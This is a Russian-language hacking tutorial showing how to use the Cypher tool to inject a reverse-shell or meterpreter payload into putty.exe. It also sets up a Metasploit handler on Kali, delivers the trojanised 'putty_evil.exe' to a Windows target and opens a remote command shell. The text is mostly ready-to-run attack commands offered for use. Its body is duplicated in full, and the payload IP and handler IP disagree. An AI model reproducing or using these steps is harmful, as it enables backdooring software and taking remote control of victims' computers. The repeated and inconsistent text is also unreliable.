Приветствую! В этой теме я продемонстрирую взлом удаленного хоста с помощью программы Cypher. Она позволит нам добавить полезную нагрузку в исполняемый файл (программу, игру, и т.д) не нарушая его целостности.
В качестве атакующей системы будет использоваться OS Kali Linux,
в качестве целевой системы Windows 8.1 с актуальными обновлениями.
Итак, вернемся к Cypher, скачиваем ее с Github:
> git clone https://github.com/xan7r/cypher
Выполняем следующие команды:
> cd cypher
> chmod a+x addShell.py
> ls –a
Теперь нам необходимо выбрать исполняемый файл для «вшивания» в него полезной нагрузки, я взял putty.exe. Скопируем Putty в директорию в Cypher.
Теперь выполним следующую команду:
> ./ addShell.py -f ./putty.exe -H 192.168.0.105 -P 4444 –p 0
В приведенной команде –p 0 – это тип полезной нагрузки, всего и х в программе доступно 5.
· 0 – windows/shell_reverse_tcp
· 1 – windows/meterpreter/reverse_http
· 2 – windows/meterpreter/reverse_http +PrependMigrate
· 3 – windows/meterpreter/reverse_https
· 4 – windows/meterpreter/reverse_https +PrependMigrate
По итогу получаем файл putty_evil.exe в папке с Cypher.
Теперь настроим на атакующем хосте handler:
> msfconsole
> use multi/handler
> set LPORT 4444
> set LHOST 192.168.0.107
> exploit
Следующим шагом будет доставка файла putty_evil.exe на целевой хост и последующий запуск приложения. После запуска, мы получаем полноценный command shell, на атакующем хосте.
Сменим кодировку командой:
> chcp 65001
Посмотрим подробную информацию о системе:
> systeminfo
Это все. Спасибо за внимание.
В качестве атакующей системы будет использоваться OS Kali Linux,
в качестве целевой системы Windows 8.1 с актуальными обновлениями.
Итак, вернемся к Cypher, скачиваем ее с Github:
> git clone https://github.com/xan7r/cypher
Выполняем следующие команды:
> cd cypher
> chmod a+x addShell.py
> ls –a
Теперь нам необходимо выбрать исполняемый файл для «вшивания» в него полезной нагрузки, я взял putty.exe. Скопируем Putty в директорию в Cypher.
Теперь выполним следующую команду:
> ./ addShell.py -f ./putty.exe -H 192.168.0.105 -P 4444 –p 0
В приведенной команде –p 0 – это тип полезной нагрузки, всего и х в программе доступно 5.
· 0 – windows/shell_reverse_tcp
· 1 – windows/meterpreter/reverse_http
· 2 – windows/meterpreter/reverse_http +PrependMigrate
· 3 – windows/meterpreter/reverse_https
· 4 – windows/meterpreter/reverse_https +PrependMigrate
По итогу получаем файл putty_evil.exe в папке с Cypher.
Теперь настроим на атакующем хосте handler:
> msfconsole
> use multi/handler
> set LPORT 4444
> set LHOST 192.168.0.107
> exploit
Следующим шагом будет доставка файла putty_evil.exe на целевой хост и последующий запуск приложения. После запуска, мы получаем полноценный command shell, на атакующем хосте.
Сменим кодировку командой:
> chcp 65001
Посмотрим подробную информацию о системе:
> systeminfo
Это все. Спасибо за внимание.